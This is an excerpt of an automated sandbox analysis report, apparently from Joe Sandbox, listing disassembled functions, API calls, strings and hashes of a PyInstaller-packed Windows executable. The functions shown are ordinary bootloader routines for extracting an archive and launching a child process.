Instruction Fuzzy Hash: A5719371A18686C9EB28EF15F4502B9A3B1FB44784FE44035D98D87B99EE2CE945CB20

Function 00007FF7691A15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7691A1785
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7691A168E
Failed to create symbolic link %s!, xrefs: 00007FF7691A15E2
Failed to extract %s: failed to open target file!, xrefs: 00007FF7691A1617
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7691A1775
malloc, xrefs: 00007FF7691A16F6
fread, xrefs: 00007FF7691A178C
fwrite, xrefs: 00007FF7691A177C
fseek, xrefs: 00007FF7691A1695
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7691A165B
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7691A16EF
fopen, xrefs: 00007FF7691A161E

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: 9f90bf69893fd466a5eac497926a5e2d94e152424ac8e9b1177f909cfdea5f56
Instruction ID: 00c4444d75a7bfdf61dccc0a815bbe355591a298c757a8cc661feb79e62edf0a
Opcode Fuzzy Hash: 9f90bf69893fd466a5eac497926a5e2d94e152424ac8e9b1177f909cfdea5f56
Instruction Fuzzy Hash: 4E519A61B08642D2EA18BF61B9001B9A3B0BF44B94FE44131EE1D87FD5EE3CE955C720

Function 00007FF7691A7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF7691A39C0), ref: 00007FF7691A800A
GetStartupInfoW.KERNEL32(?,00007FF7691A39C0), ref: 00007FF7691A802B

Part of subcall function 00007FF7691B978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B97A0

Part of subcall function 00007FF7691B7A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B7A93

GetCommandLineW.KERNEL32(?,00007FF7691A39C0), ref: 00007FF7691A80CD
CreateProcessW.KERNELBASE ref: 00007FF7691A810F
WaitForSingleObject.KERNEL32(?,00007FF7691A39C0), ref: 00007FF7691A8123
GetExitCodeProcess.KERNELBASE ref: 00007FF7691A8133

Strings

Failed to create child process!, xrefs: 00007FF7691A813F
CreateProcessW, xrefs: 00007FF7691A8146

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: 80f10013f5adadd07f0faabdc45a136860996e77bc39537f9d07cbdcaac1c13e
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 58412032A08781C5DA24AF24F4552AAB3B1FB88364FA40335E6AD47BD9DF7CD445CB50

Function 00007FF7691A11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7691A13EE
1.3.1, xrefs: 00007FF7691A1229
malloc, xrefs: 00007FF7691A129C, 00007FF7691A12CA
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7691A12C3
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7691A1256
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7691A1295

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
Instruction ID: afbe93d9745f3c213c613500cf7cb2aee57ed989e43ba1029df23616921d1b8e
Opcode Fuzzy Hash: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
Instruction Fuzzy Hash: B751E462A08642C1E669BF16B8503BAA2A1BF457A4FE44135ED4D47FD5EF3CE901C720

Function 00007FF7691A7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A7CE4
CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A7D2C

Part of subcall function 00007FF7691A7E10: GetEnvironmentVariableW.KERNEL32(00007FF7691A365F), ref: 00007FF7691A7E47
Part of subcall function 00007FF7691A7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7691A7E69

Part of subcall function 00007FF7691B7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B7561

Part of subcall function 00007FF7691A26C0: MessageBoxW.USER32 ref: 00007FF7691A2736

Strings

_MEI%d, xrefs: 00007FF7691A7CF2
TMP, xrefs: 00007FF7691A7CA2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF7691A7D5E
TMP, xrefs: 00007FF7691A7C7C, 00007FF7691A7D83
LOADER: failed to set the TMP environment variable., xrefs: 00007FF7691A7CBC

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction ID: 1f07de73959348c7c154c4174419d6cdd0ac35e422deaef3ae17e57a6a4893d9
Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction Fuzzy Hash: 4C416011F09642C1EA28BF61B9552F9D271AF45B80FE44032ED1E57BDAEE3CEA05C760

Function 00007FF7691BAD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BB199

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
Instruction ID: fdff0f622d5cce48fc36476010f4086c5bf72174902ca68bb17410ab2a2f49db
Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
Instruction Fuzzy Hash: 4FC1E862A0C687D1E769BF15B4802BDB7B2EB90B90FB54131DA5E03B99CE7CE445C320

Function 00007FF7691A7B50 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7691A7B70
OpenProcessToken.ADVAPI32 ref: 00007FF7691A7B83
GetTokenInformation.KERNELBASE ref: 00007FF7691A7BA8
GetLastError.KERNEL32 ref: 00007FF7691A7BB2
GetTokenInformation.KERNELBASE ref: 00007FF7691A7BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7691A7C0E
CloseHandle.KERNEL32 ref: 00007FF7691A7C26

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction ID: 041b1a80ef0167759184ee629d728a1cc03cbf31fc9d6165fdfceecc57fa3b13
Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction Fuzzy Hash: E3212121E0CB43C1EA14AF55B44422AE3B5EB857A4FA40235DA7D43AD8DF7CD9458B10

Function 00007FF7691A33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7691A3534), ref: 00007FF7691A3411

Part of subcall function 00007FF7691A29E0: GetLastError.KERNEL32(?,?,?,00007FF7691A342E,?,00007FF7691A3534), ref: 00007FF7691A2A14
Part of subcall function 00007FF7691A29E0: FormatMessageW.KERNEL32(?,?,?,00007FF7691A342E), ref: 00007FF7691A2A7D
Part of subcall function 00007FF7691A29E0: MessageBoxW.USER32 ref: 00007FF7691A2ACF

Strings

GetModuleFileNameW, xrefs: 00007FF7691A3422
Failed to obtain executable path., xrefs: 00007FF7691A341B
Failed to resolve full path to executable %ls., xrefs: 00007FF7691A3461
Failed to convert executable path to UTF-8., xrefs: 00007FF7691A34B8
\\?\, xrefs: 00007FF7691A3482

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: 2ded2b5c2a0a65581fc44a5f1b382f551ecfc8286e63e2e85760f546e75e70da
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: 4221A461F08642D1FE2ABF25F8113B9D270BF48394FE00532D65D869E5EE2CE906C720

Function 00007FF7691A81F0 Relevance: 9.1, APIs: 6, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A827A

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8364
FreeLibrary.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8375
FreeLibrary.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A838A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 4551d765799ef9b75e00c942335cefe8825730a2f7f2510c4597a22c5cf53bdc
Instruction ID: dc9d47760a3d2ca5b22f3a38d267201b2ff75d67f3b73484d5aa69760eebe8c4
Opcode Fuzzy Hash: 4551d765799ef9b75e00c942335cefe8825730a2f7f2510c4597a22c5cf53bdc
Instruction Fuzzy Hash: 68417C72B196C6C2EA64AF12B4042BAA3A4FF85B80F944135DF5D57B89DE3CE801C760

Function 00007FF7691A8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7691A7B50: GetCurrentProcess.KERNEL32 ref: 00007FF7691A7B70
Part of subcall function 00007FF7691A7B50: OpenProcessToken.ADVAPI32 ref: 00007FF7691A7B83
Part of subcall function 00007FF7691A7B50: GetTokenInformation.KERNELBASE ref: 00007FF7691A7BA8
Part of subcall function 00007FF7691A7B50: GetLastError.KERNEL32 ref: 00007FF7691A7BB2
Part of subcall function 00007FF7691A7B50: GetTokenInformation.KERNELBASE ref: 00007FF7691A7BF2
Part of subcall function 00007FF7691A7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7691A7C0E
Part of subcall function 00007FF7691A7B50: CloseHandle.KERNEL32 ref: 00007FF7691A7C26

LocalFree.KERNEL32(?,00007FF7691A3814), ref: 00007FF7691A848C
LocalFree.KERNEL32(?,00007FF7691A3814), ref: 00007FF7691A8495

Strings

S-1-3-4, xrefs: 00007FF7691A8441
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF7691A8462
D:(A;;FA;;;%s), xrefs: 00007FF7691A8477
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7691A84A3

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
Instruction ID: c9ab67ecba2405bd3707d9f4ccde63262c900cbab63d9f16b4404932f0a0e6fe
Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
Instruction Fuzzy Hash: 24213031A08685C2F618BF61F4153E9A2B4FB84780FE44436EA4D53B96DF3CD945C760

Function 00007FF7691A2870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

MessageBoxW.USER32 ref: 00007FF7691A2906
MessageBoxA.USER32 ref: 00007FF7691A291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF7691A290E
Warning, xrefs: 00007FF7691A28F7

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: 9d207bdff46f80c24b73023a51e38733ac9079c85033961b2fa41e774263a076
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 6A115872628A85C1EB28AF11F451BA9B378FB44B84FE05136DA9D47A44DF3CDA09CB50

Function 00007FF7691BC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691BC25B), ref: 00007FF7691BC38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691BC25B), ref: 00007FF7691BC417

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction ID: bed1e4dd73bf7a8061988640a79e5398d00ae7535076ccc8f4a81f5cab03360c
Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction Fuzzy Hash: C991C572F08651C5FB59AF69B4802BDABB2BB44B88FB44135DE0E57A98CE3CD541C720

Function 00007FF7691B4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B4965
CreateFileW.KERNELBASE ref: 00007FF7691B49A4
CloseHandle.KERNEL32 ref: 00007FF7691B49D9

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: c2eeb7f67fa1e534e526dd6ba652d07add4fafd3948086991fac0e0a2c5cdccf
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: 3141A422E18782C3F758AF21A550379A271FB98764F60D334E69D03AD9DF7CA1E08720

Function 00007FF7691ABF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691AC12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7691AC140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7691ABF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF7691ABFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7691AC041

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: bfec92e3096652305083d854b917d71b81dec52d2203318917b55f33305ec71f
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: 7C313815A4C243C2FE1DBF64B6513B9A2B19F41784FE44035E90E8BAD7DE2CAC04C675

Function 00007FF7691B8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7691B8D44), ref: 00007FF7691B8D59
TerminateProcess.KERNEL32(?,?,?,00007FF7691B8D44), ref: 00007FF7691B8D64
ExitProcess.KERNEL32 ref: 00007FF7691B8D73

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction ID: 10f045a32a5edf8b4d635272e143ea51e5789b26839b77cb43b70708e02479d1
Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction Fuzzy Hash: 89D06714B59606C7EA5C3F70785917992365F58B01FA41879D84B46397CD2CA80D8660

